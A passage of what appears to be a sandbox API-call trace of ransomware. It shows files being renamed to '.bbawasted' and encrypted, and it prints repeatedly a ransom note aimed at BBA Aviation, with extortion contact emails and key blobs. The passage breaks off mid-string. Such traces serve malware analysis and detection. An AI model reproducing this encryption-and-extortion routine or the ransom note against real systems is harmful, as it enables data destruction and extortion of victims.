(lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0178.950] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0178.952] SetEndOfFile (hFile=0x28c) returned 1 [0178.952] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.952] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.952] lstrcpyW (in: lpString1=0x6aed38, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0178.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.bbawasted")) returned 1 [0178.953] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0178.953] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0178.953] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x97f2 [0178.954] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x97f2) returned 0x640000 [0178.954] CloseHandle (hObject=0x294) returned 1 [0179.078] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0179.079] CloseHandle (hObject=0x280) returned 1 [0179.079] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0179.079] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0179.080] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0179.080] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0179.080] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0179.081] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0179.081] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0179.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0179.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0179.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0179.093] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]SrB2O65cZcaRWQLGgkEhe7/YlAi9lb3YnLkmB69zkH63HdAOMyIkLSBLoHRtmes5\r\nIqiQzrmGgyj26q403QqISkq4OoFvNPa6brvpy5FnTnE2jTEwSB59ZkncjbKIPsH+\r\nPpXn/ln66lATawth8LMJP0i2LRqP30ft41igOfmShOydwohKsl02WhaTi9KCmjyL\r\nH3vi1O230ZE96WkEpf7t1n+GIeIe13TAZ4amu8og13Wb+5LUsZBiiTfeQD71aGC6\r\n4kQ2muJPn5e/ff/ciF8lfYlHNtXVcwJVBUwqTwoaw3bxgl1vwOJjeUoCUPxELXW0\r\nifOyUnonJq7BfISOOGJ/vJh3MUJ/IYe/X7K0ALuBR4Bye697yjjHE4hgx99vS8xF\r\nVdKfii7GUWO3FQpoGdaLZ/CEw4Em+KG0YPKkyc81CSFrAeiKdEboobu8GNOw/Uea\r\ntpVYxG+ziW2BDl9LdVL2epu6ewjaEq7Q4d5D0McJa6rU78FYT3Y2Okm+DyXy/pYg\r\nBeTHmhI37JpgukflAftnilhzl6N3snPXrQLgp5j2GuafWH59BywA2Lvt2xb9ZU1y\r\nW+QHnfVjxicxlVsgIRn2VhJWrpk17M5FeFjFBc334yWCnoqs5nrwi5NjJS4Cmbic\r\nrTkF33cbNe1jTXpLFfk/iS3cb6laWKTiQR6jid/++hb=[end_key]\r\nKEEP IT\r\n") returned 984 [0179.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0179.093] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0179.093] SetEndOfFile (hFile=0x28c) returned 1 [0179.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0179.097] CloseHandle (hObject=0x28c) returned 1 [0179.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0179.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2dc8 | out: hHeap=0x660000) returned 1 [0179.102] _aulldvrm () returned 0x0 [0179.102] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0179.102] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0179.102] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0179.102] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp") returned 39 [0179.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0179.103] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0179.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0179.103] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0179.103] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0179.103] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0179.103] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0179.104] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0179.106] SetEndOfFile (hFile=0x28c) returned 1 [0179.106] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0179.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0179.106] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0179.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.bbawasted" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.bbawasted")) returned 1 [0179.107] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp.bbawasted" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0179.107] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0179.108] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x19688 [0179.108] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19688) returned 0x640000 [0179.108] CloseHandle (hObject=0x280) returned 1 [0179.255] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0179.255] CloseHandle (hObject=0x294) returned 1 [0179.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0179.256] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0179.256] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0179.256] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0179.257] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0179.257] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0179.257] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0179.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0179.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0179.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0179.270] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]arDgzVwdLLA+bj+n6Sy0XQX3z8d+LMKaJkH7zAURkt80YaCI2V0BtgSnhuN5j/1P\r\nDQhpquvPyrPxAH8uHxAB5eG2NLEyCxWYIZ4PQzX3i8ZkuSW8BdzUWFu7gypd6PVO\r\n20BuT6pA8SIQtz/XVjfSqSW9wwtSI21FcYpvAK5VpQjqfL4AZXUyWj6P/BX8z3Yi\r\ngLyaOw9SIWNZKFrHOWPU9bdTZdZWAtdfKyI0JGN9GZQ1RLys+zvpidxIVo+6gHir\r\nC7X3KC3qWJxkq0k83xXpbodqKONj/CQVlqFgtHs6Bx5LEJvCFuJD3CYU+u93dFGY\r\nOsNu4PR890/T/3vBwWQ+mvLV6t2UZqyhCyPNVVVZVs0NoSQTGYqi0QRDQLbPY8yn\r\nVuCKPby4scG7bIKOEgj9DGk0N5VTvJk1+HGFRf2BJ6kYU+j4SNLUUef2KgIXXnhJ\r\nhyZTKiDzJ0MZu98M6agELA5jrl1Ol2Djp9k0GffY1fwJ4NDRY0xvi6qWrgC37TMi\r\naGLfhFqbG60fZGz+SgRyKDCClvYCgepZWvgn6v9gk4d0JsJKSz60AQ5oqWNiQRlx\r\ngzB/QdVXqy6TiIlcI6rLYsu4J1rPUgTEQ/IckW9/HannnuTBy5eF6Ikpm6WeHvgB\r\nMaCelmMI9+S96c/mze+24pKsYlD2ZkpBqUV6DacnDzw=[end_key]\r\nKEEP IT\r\n") returned 984 [0179.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0179.270] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0179.270] SetEndOfFile (hFile=0x28c) returned 1 [0179.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0179.273] CloseHandle (hObject=0x28c) returned 1 [0179.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0179.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2690 | out: hHeap=0x660000) returned 1 [0179.276] _aulldvrm () returned 0x0 [0179.276] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f10) returned 1 [0179.277] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0179.277] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0179.277] lstrlenW (lpString="\\\\?\\C:\\Logs\\Application.evtx") returned 28 [0179.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x242) returned 0x6ae598 [0179.277] lstrcpyW (in: lpString1=0x6ae5d0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0179.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0179.277] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6708) returned 1 [0179.278] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0179.278] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0179.278] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx.bbawasted_info" (normalized: "c:\\logs\\application.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0179.281] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0179.283] SetEndOfFile (hFile=0x28c) returned 1 [0179.283] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0179.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0179.283] lstrcpyW (in: lpString1=0x6ae5d0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0179.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Application.evtx.bbawasted" (normalized: "c:\\logs\\application.evtx.bbawasted")) returned 1 [0179.323] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx.bbawasted" (normalized: "c:\\logs\\application.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0179.323] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0179.323] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0179.323] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0179.324] CloseHandle (hObject=0x294) returned 1 [0179.754] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0179.755] CloseHandle (hObject=0x280) returned 1 [0179.755] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0179.755] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a69b0) returned 1 [0179.755] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0179.755] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0179.756] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0179.756] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0179.756] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0179.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0179.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0179.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0179.768] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QbKLJokMobty7pPSpnokpWxzmf8tb+rnyNK6lVtqzBdm5aI+zKFWzMJs8B23ITS2\r\ntHg1RFKZz99XCym7ff9pth/QsEtmspuPNbRN6CMxPxPAH67iec6W9D6/Y2r2651H\r\nFruVwmtodAXN7SOQx8VJgtI9aVXDa0VAWtryiGvxEEkcVeVlHSJxrVpuh/ZjFCMU\r\nZkBhJNgOjfEKYdneX4wNTpZ0FkbOZeq90e3akpFNRlSUDeJCjBkiKauc55cGDiiF\r\nh5o+8fCtk/e8pUP29RrNuQ+bNr+lgniMmK3/ZMbpUeEMyFoFqae7YJKBKK/ZIqDp\r\nTYyAgw9O08YXZpPS+9Fe69Bnm3PoP7EKVTPmRRXzAqCJD+QE91o+J1MluEclnj3z\r\n/6UAA1g72ONgHpMnMMLxw8iuxoYN+srsAWyaz2/Q72jLCTsML2QDi+b8P2WUsvpk\r\n6/dwDqicAVkL7m38eWwwhqyst9gvmWOtx0LjAJlBuotTnFtkp0zd/NecYd1ro0BX\r\njBg9dBakTe4aI7Yn8ETLA+QbXWGjuJ+QyzVDYsHq5MaGw2eZdlgOw7GWX3YL7bvJ\r\ncCY5whOfXCT7BsD/Wr8mFfFv9X6TZOetqrUJwDhlomHx7wc0PM1vENsLCDgMmbJc\r\nstFQCMDf2lzkEmh9M/21xLdOZf8VgO9MCkN47INS+gl=[end_key]\r\nKEEP IT\r\n") returned 984 [0179.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0179.768] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0179.768] SetEndOfFile (hFile=0x28c) returned 1 [0179.771] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0179.771] CloseHandle (hObject=0x28c) returned 1 [0179.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0179.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x688f28 | out: hHeap=0x660000) returned 1 [0179.774] _aulldvrm () returned 0x0 [0179.774] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6928) returned 1 [0179.774] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0179.774] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0179.774] lstrlenW (lpString="\\\\?\\C:\\Logs\\HardwareEvents.evtx") returned 31 [0179.774] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x248) returned 0x6ae598 [0179.775] lstrcpyW (in: lpString1=0x6ae5d6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0179.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0179.775] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0179.775] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0179.775] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0179.775] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx.bbawasted_info" (normalized: "c:\\logs\\hardwareevents.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0179.777] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0179.778] SetEndOfFile (hFile=0x28c) returned 1 [0179.778] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0179.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0179.778] lstrcpyW (in: lpString1=0x6ae5d6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0179.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx.bbawasted" (normalized: "c:\\logs\\hardwareevents.evtx.bbawasted")) returned 1 [0180.396] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx.bbawasted" (normalized: "c:\\logs\\hardwareevents.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0180.397] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0180.397] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0180.397] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0180.397] CloseHandle (hObject=0x280) returned 1 [0180.425] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0180.427] CloseHandle (hObject=0x294) returned 1 [0180.427] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0180.427] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0180.428] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0180.428] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0180.428] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6b48) returned 1 [0180.429] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0180.429] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0180.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0180.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0180.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0180.441] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS 